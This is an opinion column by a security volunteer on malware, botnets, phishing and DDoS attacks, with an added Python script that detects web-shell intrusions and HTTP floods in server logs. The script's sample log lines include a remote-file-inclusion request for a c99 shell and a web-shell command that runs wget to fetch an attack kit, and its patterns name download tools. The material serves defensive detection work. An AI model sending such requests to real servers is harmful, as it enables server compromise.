Malicious Software: One Person's Perspective

By Paul Laudanski, CastleCops , Microsoft MVP Windows-Security

See other Security MVP Article of the Month columns.

There have been many times while playing Zuma on our Xbox 360 that my wife or I failed to complete a level before using all our lives, and so we would just restart and try again. It sure is nice having another shot at the same level regardless of how we previously did. Imagine, for a moment, what life would be like with computers sans malicious software, or malware. What if we could “try again” and remove malicious software from the human timeline?

All of a sudden, many of the problems we experience today would be gone. Distributed denial-of-service attacks would have no meaning. Spam would no longer deluge our inboxes. Our confidential user accounts would not be revealed via keyloggers. Sony would never have installed spyware, nor would the FTC have issued a judgment against them. Banks and consumers would not be defrauded of money. Rootkits and a plethora of other threats would not exist. Alas, these are the effects of malicious software today, and, sadly, we cannot erase them from our past or present.

In the beginning, before the Internet, malicious software was spread by the sneakernet. Often, malware was written to infect a floppy disk's boot sector. But in this day and age, malware has matured beyond hard drive formats and file deletions. Thanks to malware, we see compromised computers on the Internet generally used as bots in a botnet. These botnets are controlled by bot herders, who lease them to other miscreants to conduct malicious activities such as spamming (pump and dump, pharmaceutical, etc.), phishing, and distributed denial of service attacks. Malicious software has created a convoluted blended threat in today’s world. These attacks have expanded because of the money involved, which, as MessageLabs states, is a multibillion dollar industry—albeit an illegal one.

Since the launch of CastleCops, we have seen malicious software shift and morph from simple, single-technique malware with no financial motive into today’s high-tech espionage. Furthermore, since 2006 and the launch of the Phishing Incident Reporting and Termination Squad (PIRT), we have witnessed malware control an ever-increasing number of bots.

How is it that these systems are being used for phishing attacks? Phishing starts off with spam e-mail. For the most part, unless users get an e-mail with a link to the phish site, it will not be visited by potential victims. Typically, the spam is sent by compromised computers that are controlled by the malefactors. These systems are generally always-on, broadband-connected personal computers that have been infected with malware. These same bots are frequently used to host a distributed phishing attack. So if one bot is successfully taken offline and repaired, another bot will spring into action, keeping the phish alive.

There are also cases where Web servers have been compromised through insecure code or missing defenses. These legitimate Web servers often run unpatched Web applications that criminals exploit. In such instances, a crafted request is sent to the Web application that causes it to fetch and execute a Web shell, giving the culprit command-line access on the server. At this point, the trespasser, through the use of the Web shell, downloads and installs a ready-made “kit” that can send spam, run a phish, or set up a command and control server that tells the bots in the herd what to do.

So as potential victims receive phish spam, the miscreants play the numbers game. The more people who receive the spam, the more who become victims. The evildoers hope that their phish sites will deceptively gather consumer information such as credit card numbers, social security numbers, names, birth dates, home addresses, phone numbers, user logins, and passwords—all of which can be used for bank fraud and identity theft.

Spam e-mails are the catalysts for many ill-intended activities like mortgage scams, money-mule recruitment, phishing, pump and dumps, pharmaceuticals, and trojans that recruit machines into botnets. Beyond spamming and phishing, bots are often used to shut down a Web site or extort money from its operators.

In December 2006 through January 2007, the highly regarded antirootkit application GMER had its Web site taken offline by a distributed denial of service attack. The malware running on the infected computers was tasked with a command to flood the www.gmer.net domain with HTTP requests. The attack effectively shut down access to the site, and ultimately prevented victims from downloading GMER in order to expose and remove rootkits from their systems. Thankfully, many in the community responded by bringing up mirrors, but many of them were also targeted by the botnet and subsequently taken offline. GMER was not back online until, thanks to Paul Vixie, the domain was moved to the Internet Systems Consortium, which has the capacity and ability to absorb the attack.
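Both attacks above leave traces in ordinary Web server access logs: the Web-shell scenario (a request whose parameter points at a remote payload, then a request carrying a shell command) and the HTTP flood (a burst of requests from many distinct bots in the same second). The following script is an added example written for this column; it is not CastleCops or GMER code and does not describe either site's real logs. It parses combined-format access-log lines, flags remote-inclusion and command parameters, and flags any second in which the request count and the number of distinct sources both exceed a threshold. All log lines, addresses and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" access-log format: ip ident user [ts] "METHOD uri HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# A parameter whose value is a remote URL is the classic remote-file-inclusion vector.
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# Download tools typed into a Web-shell "command" box to pull down a kit.
DOWNLOAD_TOOL = re.compile(r'\b(wget|curl|lwp-download|fetch)\b', re.IGNORECASE)
# Parameter names commonly used by ready-made Web shells (assumed list, not exhaustive).
COMMAND_PARAMS = {"cmd", "exec", "command", "execute"}

# Constructed sample traffic (documentation address ranges, not real hosts).
SAMPLE_LINES = [
    '203.0.113.5 - - [10/Feb/2007:08:15:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [10/Feb/2007:08:15:02 +0000] "GET /index.php?page=http://198.51.100.77/c99.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [10/Feb/2007:08:15:03 +0000] "POST /images/cache.php?cmd=wget%20http://198.51.100.77/kit.tgz HTTP/1.1" 200 77 "-" "Mozilla/4.0"',
]
# Constructed HTTP flood: 60 distinct bot addresses hit the front page in the same second.
SAMPLE_LINES += [
    f'192.0.2.{i} - - [10/Feb/2007:08:15:10 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/4.0"'
    for i in range(1, 61)
]


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def suspicious_params(uri):
    """Reasons a request looks like remote file inclusion or Web-shell use (empty if none)."""
    reasons = []
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        if REMOTE_SCHEME.match(value):
            reasons.append(f"remote_include:{name}")
        if name.lower() in COMMAND_PARAMS:
            reasons.append(f"command_param:{name}")
        if DOWNLOAD_TOOL.search(value):
            reasons.append(f"download_tool:{name}")
    return reasons


def analyze(lines, flood_requests=50, flood_sources=10):
    """Flag Web-shell style requests and per-second HTTP floods across a list of log lines."""
    webshell = []
    counts = defaultdict(int)        # second -> number of requests
    sources = defaultdict(set)       # second -> distinct source addresses
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                 # ignore lines that are not in combined format
        reasons = suspicious_params(rec["uri"])
        if reasons:
            webshell.append({"ip": rec["ip"], "uri": rec["uri"], "reasons": reasons})
        key = rec["ts"].isoformat()
        counts[key] += 1
        sources[key].add(rec["ip"])
    # A single chatty client is not a DDoS; require both volume and many distinct sources.
    flood = [
        {"second": key, "requests": n, "distinct_ips": len(sources[key])}
        for key, n in sorted(counts.items())
        if n >= flood_requests and len(sources[key]) >= flood_sources
    ]
    return {"webshell": webshell, "flood": flood}


if __name__ == "__main__":
    report = analyze(SAMPLE_LINES)
    for hit in report["webshell"]:
        print("WEBSHELL", hit["ip"], hit["uri"], ",".join(hit["reasons"]))
    for burst in report["flood"]:
        print("FLOOD", burst["second"], burst["requests"], "requests from", burst["distinct_ips"], "sources")
```

The thresholds are deliberately a single-second window with a low bar so the constructed sample trips them; on a real server you would tune them to the site's normal traffic and feed the script the live log. The remote-inclusion check catches the first step of the compromise described above, and the command-parameter check catches the shell being driven afterwards, which is the point at which the "kit" gets installed.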

Around the middle of February 2007, CastleCops itself became the target of a large-scale DDoS. CastleCops was not new to this kind of attack, but it was the first time we had experienced such volume, nearly 1 Gbit/s. Prolexic offered their services pro bono, protecting our name servers. ISC OARC graciously donated hosting services to absorb the attack. The community at large, in a tour de force rescue effort, saved CastleCops. We will not be silenced.

Malware is not just a technical problem; it is also a social pandemic. Take the case of the phish spam, for instance. Many Internet citizens are, by nature, trusting. When potential victims receive an e-mail about how they can help their bank to recover their account after a system upgrade, they generally think they are being good citizens by responding. In fact, one reporter I spoke with last year had this happen to him. One morning he received an e-mail purporting to be from his bank, and, being a good bank citizen, he wanted to help recover his information by furnishing it at the Web site link provided. It wasn’t until later that the reporter realized it was a phish scam, not really a request from his bank.

Money drives crooks today to deploy malicious software. So how do we find, track, and categorize that malware across the globe? A recently launched service by Arbor Networks, the Active Threat Level Analysis System (ATLAS), attempts to do just that. Arbor Networks has the reach and visibility on the Internet backbones to track malicious activity, which in turn enables them to provide intelligence about malicious software, phishing, and botnets in real time. The public has access to this information at the ATLAS Web site. It is this kind of data enrichment that will help find and put an end to ill-intended behavior.

So what can ordinary Netizens do to help protect the Internet against malware? I attend conferences and give presentations on such topics, and one question I love to ask is akin to “How many of you delete your spam?” Typically, many people raise their hands. But what should be done? Communication is necessary to bring an end to malicious behavior and that is no different here. The spam we all receive is actually evidence of a crime. Forward your spam to the proper authorities and organizations that not only track, but also investigate, preserve, and take down the scams—efforts that can lead to arrests and prosecutions. Let us band together and send a clear message to malware writers and other lawbreakers that we are taking back our Internet.

But what can we do to secure our computers? We must run updated anti-malware applications that spot malware through heuristics as well as signature definitions. Sometimes we have to deal with zero-day threats, which are often difficult to detect using known signatures, so running a firewall with both outbound and inbound protection is crucial. Such a firewall can detect and alert on any unauthorized outbound connection attempts, such as a freshly installed bot contacting its command and control server. Another critical component in keeping your computer free from bot herders is to patch your operating system and applications. Much of today’s malware targets Microsoft systems that are not patched, so be sure to pay attention to Microsoft’s “Patch Tuesday.” But, more importantly, do not use your computer on a regular basis with a profile that has administrative access. Instead, create and log on with a profile that has restricted access rights, so that if zero-day malware is downloaded, it may be hindered from installing itself system-wide due to the limited permissions of such an unprivileged account. You want to set up as many layers of defense as possible, making it difficult for the transgressors to control your system. Windows Vista, as a point of interest, makes this the default setup through User Account Control.

In addition, set up your anti-malware scanners to monitor your activity in real time on top of a scheduled full system scan. There are also online scanner vendors you can tap into to provide another independent analysis of your computer. CastleCops maintains a list of vendors that provide free security solutions if you cannot afford a pay-for product.

Microsoft has its own free anti-malware scanner, updated on Patch Tuesdays, called the Windows Malicious Software Removal Tool (MSRT). The MSRT team released a white paper on its progress and lessons learned, which includes statistics such as 16 million instances of malware removed from more than 5.7 million unique Windows installations during a 15-month period. One in every 311 computers was infected with malware! Windows Live OneCare, another Microsoft product, offers broader malware detection than the MSRT and includes a full suite of security services.

So what will it take to defeat the offenders and the severity of today’s blended malicious software once and for all? Communication and teamwork are required among industry (Internet Service Providers, Registrars, Banks, and Public Advocacy Groups), government (Law Enforcement, Computer Emergency Response Teams, and Prosecutors), academia, and consumers. But trust is required to build teamwork. And the individuals (developers, system administrators, lawyers, and management) can foster trust by being truthful. There is logic in the saying, “As truth stretches, trust breaks.” With the technical solutions in place supported by globalized teamwork, we have a high chance of success in bringing an end to the malware plague. And in this pledge, we can take back our Internet and win this fight against the dark side.